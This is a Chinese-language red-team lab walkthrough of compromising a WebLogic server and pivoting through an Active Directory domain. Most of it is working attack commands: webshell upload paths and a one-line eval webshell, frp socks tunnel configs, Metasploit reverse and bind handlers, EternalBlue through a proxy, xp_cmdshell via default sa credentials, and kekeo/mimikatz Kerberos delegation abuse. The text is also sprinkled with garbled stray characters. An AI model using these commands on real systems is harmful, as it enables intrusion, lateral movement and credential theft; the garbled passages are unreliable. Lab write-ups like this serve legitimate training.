聲明
以下內(nèi)容扬跋,來自moon_flower作者原創(chuàng),由于傳播双肤,利用此文所提供的信息而造成的任何直接或間接的后果和損失纹磺,均由使用者本人負(fù)責(zé)帖烘,長白山攻防實(shí)驗(yàn)室以及文章作者不承擔(dān)任何責(zé)任。
外網(wǎng)weblogic服務(wù)器
不知道為什么 ping 不通爽航,直接訪問 7001蚓让,上一波 weblogic 掃描器直接拿下
物理路徑:C:\Oracle\Middleware\Oracle_Home\wlserver\server\lib\consoleapp\webapp\framework\skins\wlsconsole\images\shell.jsp
訪問路徑:
/console/framework/skins/wlsconsole/images/shell.jsp
能傳上但訪問404
寫入uddiexplorer目錄中
物理路徑:
C:\Oracle\Middleware\user_projects\domains\base_domain\servers\AdminServer\tmp\_WL_internal\uddiexplorer\隨機(jī)字符\war\shell.jsp
訪問路徑:
/uddiexplorer/shell.jsp
(發(fā)現(xiàn)沒這個(gè)目錄)
寫入應(yīng)用安裝目錄
物理路徑:C:\Oracle\Middleware\user_projects\domains\application\servers\AdminServer\tmp\_WL_user\項(xiàng)目名\隨機(jī)字符\war\shell.jsp
訪問路徑:
/項(xiàng)目名/shell.jsp
(也沒路徑)
域內(nèi)個(gè)人PC
[common]
bind_addr =0.0.0.0
bind_port = 7000
跳板機(jī):
[common]
server_addr = 192.168.0.128
server_port = 7000
[plugin_socks]
type = tcp
remote_port = 7777
plugin = socks5
用CS派生一個(gè)監(jiān)聽道到 msf乾忱,用msf繼續(xù)打橫向:
use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.0.128
set lport 20001
連上之后遷移進(jìn)程
run post/windows/manage/migrate
msf掛上代理打永恒之藍(lán):
set Proxies socks5:192.168.0.128:7777
set ReverseAllowProxy true
注意這里不要直接用ms17_010_eternalblue打,很容易打藍(lán)屏历极,用 ms17_010_comman彈命令開遠(yuǎn)程桌面打窄瘟。(但這里會(huì)有各種奇奇怪怪的bug,算第三個(gè)坑)
域滲透
先做本機(jī)信息收集趟卸,win7系統(tǒng)蹄葱,另一張網(wǎng)卡10.10.10.0/24,存在域 redteam.red锄列,沒什么補(bǔ)丁图云,探測一下域環(huán)境。然而現(xiàn)在是system權(quán)限不在域中邻邮,考慮用msf的steal_token實(shí)現(xiàn)降權(quán)竣况,重新反彈一個(gè)shell到CS中。
這里嘗試通過委派打其他主機(jī)筒严,其他方式見坑4丹泉。
傳一個(gè)Adfind上去,查找一下配置了委派的用戶
查詢配置了非約束委派的主機(jī):
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
查詢配置了非約束委派的用戶:
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" cn distinguishedName
查詢配置了約束委派的主機(jī):
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
查詢配置了約束委派的用戶:
AdFind.exe -h 10.10.10.8 -u saul -up admin!@#45 -b "DC=redteam,DC=red" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" cn distinguishedName msds-allowedtodelegateto
shell fscan64.exe -np -h 10.10.10.0/24
80沒東西鸭蛙,爆破一下1443的sa用戶摹恨,密碼sa,傳個(gè)工具進(jìn)行連接娶视,這里選用的是SqlKnife
shell SqlKnife.exe -H 10.10.10.18 -P 1433 -u sa -p sa --xpcmd -c whoami
shell SqlKnife.exe -H 10.10.10.18 -P 1433 -u sa -p sa --dbup2 --3 --fix
shell SqlKnife.exe -H 10.10.10.18 -P 1433 -u sa -p sa --dbup2 -c whoami
[common]
server_addr = 10.10.20.12
server_port = 9000
[plugin_socks]
type = tcp
remote_port = 9999
plugin = socks5
frps.ini
[common]
bind_addr =0.0.0.0
bind_port = 9000
https://github.com/RowTeam/SharpSQLTools/帶GUI界面執(zhí)行文件晒哄。但不知道為什么一直沒辦法反彈到cs上,(或許不能彈中繼的中繼?)
最后還是用msf生成正向shell的馬傳到sqlserver上,再用EfsPotato 提權(quán)后去執(zhí)行肪获,得到一個(gè)system權(quán)限的meterpreter.(其實(shí)這里用CS的beacon_tcp也可以實(shí)現(xiàn)正向連接)msf監(jiān)聽:
handler -p windows/x64/meterpreter/bind_tcp -H 10.10.10.18 -P 30003
cs跳板機(jī)正向連接
connect 10.10.10.18 30004
echo ^<%%^@Page Language^=^"Jscript^"%%^>^<%%eval^(Request^.Item^[^"saul^"^]^,^"unsafe^"^)^;%%^> > c:\inetpub\wwwroot\1.aspx
連上webshell之后就要想辦法提權(quán)了
查詢當(dāng)前系統(tǒng)缺失的常見可用于提權(quán)的補(bǔ)肚蘖琛:
systeminfo > micropoor.txt&(for %i in ( KB977165 KB2160329 KB2503665 KB2592799 KB2707511 KB2829361 KB2850851 KB3000061 KB3045171 KB3077657 KB3079904 KB3134228 KB3143141 KB3141780 ) do @type micropoor.txt|@find /i "%i"|| @echo %i you can fuck)&del /f /q /a micropoor.txt
kekeo.exe "tgt::ask /user:sqlserver /domain:redteam.red /password:Server12345 /ticket:administrator.kirbi" > 1.txt
用生成的
TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi獲取域機(jī)器的ST:
kekeo.exe "tgs::s4u /tgt:TGT_sqlserver@REDTEAM.RED_krbtgt~redteam.red@REDTEAM.RED.kirbi /user:Administrator@redteam.red /service:cifs/owa.redteam.red" > 2.txt
最后用mimikatz將ST2導(dǎo)入當(dāng)前會(huì)話
mimikatz kerberos::ptt TGS_Administrator@redteam.red@REDTEAM.RED_cifs~owa.redteam.red@REDTEAM.RED.kirbi
抓密碼或dump密碼,但運(yùn)行mimikatz只能看到saul的密碼贪磺,利用價(jià)值不大硫兰。
嘗試令牌竊取诅愚,但ps中沒有域控進(jìn)程寒锚,遂放棄
已有漏洞,如zerologon的重置密碼等
委派违孝,先打其他主機(jī)
待補(bǔ)充刹前,但可參考
https://github.com/infosecn1nja/AD-Attack-Defense
沒解決的問題:
一路的坑,之后慢慢填
CS和MSF操作上有很多的問題
多層內(nèi)網(wǎng)的反彈shell(后來一直都是正向鏈接雌桑,有防火墻的話就很難受)
沒過殺軟喇喉,大問題
流量不夠隱蔽,沒有很好的利用各種隧道隱藏技術(shù)
參考文獻(xiàn)
https://www.sqlsec.com/2018/03/smb.html
http://deepmountains.cn/2021/03/08/2.%20Cobalt%20Strike%E4%B9%8Bbeacon%E7%9B%91%E5%90%AC%E5%99%A8/
https://www.freebuf.com/vuls/304576.html
https://0rangex.github.io/2022/01/26/Domain-penetration_one-stop/
https://www.anquanke.com/post/id/250346